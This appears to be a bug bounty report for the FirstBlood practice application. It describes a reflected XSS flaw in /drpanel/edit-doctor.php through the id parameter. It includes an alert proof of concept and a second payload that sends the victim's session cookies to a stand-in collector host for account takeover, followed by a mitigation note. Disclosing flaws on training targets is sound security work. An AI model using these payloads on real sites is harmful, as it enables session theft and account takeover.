FirstBlood-#1116Reflected XSS on /edit-doctor.php
This issue was discovered on FirstBlood v3



On 2022-12-08, 0xblackbird Level 5 reported:

Summary:

Hi mate!

I hope you're doing well today!

I found a reflected XSS vulnerability on /edit-doctor.php that led to account takeover of any doctor's account.

Possible cause:

User input that got passed through the id query parameter and was not validated or encoded properly.

Impact:

I was able to execute javascript code on the doctor's behalf. Furthermore, I was also able to steal the sensitive session cookie as it is not an HTTPOnly cookie. This allowed me to successfully takeover the account of the doctor.

Steps to reproduce:

Proof of concept: /drpanel/edit-doctor.php?id=1337%27)">x</button><script>alert(document.domain)</script>

1) Spin up firstblood v3 if you haven't already 2) Visit the path PoC above 3) An alert popup should appear with the document's domain

We can easily takeover the doctor's account as cookies are not HTTPOnly. To do so, we could use the following payload to steal and send the cookies back to us:

/drpanel/edit-doctor.php?id=1337%27)">x</button><script>location.href=%60//{BURP_COLLABORATOR}/collector?cookies=${document.cookie}%60</script>

Upon visiting the URL (as the victim), we can see a hit with the cookies on our server:

Mitigation

For reflected and stored XSS vulnerabilities it is always necessary to encode any user input accordingly. Here, the single quote was left unencoded and allowed me to escape the variable context.

Thanks for hosting such an awesome event again!

Kind regards, 0xblackbird

P3 Medium

Endpoint: /drpanel/edit-doctor.php

Parameter: id

Payload: 1337%27)">x</button><script>alert(document.domain)</script>


FirstBlood ID: 63
Vulnerability Type: Reflective XSS

The endpoint /edit-doctors.php is vulnerable to reflective XSS via the ?id parameter